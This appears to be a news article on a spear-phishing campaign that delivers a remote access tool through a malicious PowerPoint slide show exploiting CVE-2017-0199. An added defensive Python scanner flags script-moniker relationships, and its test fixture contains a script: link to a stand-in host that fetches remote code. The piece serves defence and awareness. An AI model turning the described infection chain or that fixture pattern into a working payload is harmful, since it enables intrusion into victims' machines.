Microsoft Office users beware: New malware comes through PowerPoint email attachment

A new malware campaign is making its way into businesses through a malicious PowerPoint email attachment, Trend Micro research has found. According to the blog post, exploits of CVE-2017-0199 have traditionally used RTF documents, and this is the first time the vulnerability has been seen abused through a PowerPoint Slide Show (PPSX) file in the wild.
The malware comes in an email that appears to be from a company that manufactures cables. The email tells the recipient to see the order and asks them to quote cost, insurance, and freight (CIF) and free on board (FOB) prices as well. Because the email is targeted, with the criminals typically going after electronics companies, the post said, it is being considered a spear phishing attack.
In the sample email provided by Trend Micro, the attachment is titled PO-483848.ppsx. In this case, PO could be short for purchase order, in an effort to increase the perceived legitimacy of the PowerPoint file.
If the victim opens the attached file, there will be no purchase order, not even any fake text attempting to be one. It simply reads: CVE-2017-8570. That’s the name of another Microsoft vulnerability, the post said, but not the one that this particular malware is targeting.
PowerPoint then initializes a script moniker and runs the malicious payload, the post said. If successful, it will download an XML file from the internet. Some JavaScript code in that XML file runs a PowerShell command that downloads and executes a remote access tool.
At this point, the attackers will be able to run remote commands on the victim’s machine. “The tool’s capabilities are quite comprehensive, and includes a download & execute command, a keylogger, a screen logger, and recorders for both webcam and microphone,” the post said.
The biggest issue with this particular attack is that it arrives as a PowerPoint file. Most current detection methods focus on the RTF delivery method, which means attackers using PPSX files could have an easier time evading antivirus detection, the post said.
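As an added example (not code from the Trend Micro post or TechRepublic), the check below opens a PPSX as the OOXML zip package it is and flags relationship parts that point outside the package using the script: moniker the article describes; the package contents and the malicious.invalid URL are constructed fixtures, not samples from the campaign.

```python
import io
import zipfile
from xml.etree import ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# URI schemes that are ordinary for hyperlinks; any other scheme in an
# External relationship (notably script:) deserves analyst attention.
BENIGN_SCHEMES = {"http", "https", "mailto", "file"}


def scan_ppsx(data: bytes) -> list[str]:
    """Return a finding per suspicious External relationship in the package."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts cannot reach the network
                target = rel.get("Target", "")
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                scheme = target.split(":", 1)[0].lower() if ":" in target else ""
                # Flag unusual schemes, and any OLE object resolved externally.
                if scheme not in BENIGN_SCHEMES or rtype == "oleObject":
                    findings.append(f"{name}: {rtype} -> {target}")
    return findings


def build_sample(rels_xml: str) -> bytes:
    """Constructed minimal package holding one slide .rels part (fixture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Constructed fixtures: a normal hyperlink and a script-moniker OLE relationship.
BENIGN_RELS = (f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId1" '
               f'Type="{REL_TYPE}hyperlink" Target="https://example.com/" '
               'TargetMode="External"/></Relationships>')
SUSPICIOUS_RELS = (f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId2" '
                   f'Type="{REL_TYPE}oleObject" '
                   'Target="script:http://malicious.invalid/placeholder" '
                   'TargetMode="External"/></Relationships>')

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        print(label, scan_ppsx(build_sample(rels)))
```

The same scan applies to PPTX and other OOXML packages, since every part's relationships live in .rels files of this form.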
To protect against attacks like this one, businesses should make sure that their systems are properly patched and updated to account for any known vulnerabilities. Also, users should be regularly educated on proper security hygiene and email etiquette.
The 3 big takeaways for TechRepublic readers
- A new spear phishing campaign is using PowerPoint files to exploit CVE-2017-0199 and deliver malware to victims.
- If a user clicks on the attached file, it will run a remote access tool, and could allow attackers access to a user’s keystrokes, screen, webcam, and microphone.
- IT should keep systems updated and educate users on proper behavior regarding attachments and emails from outside parties.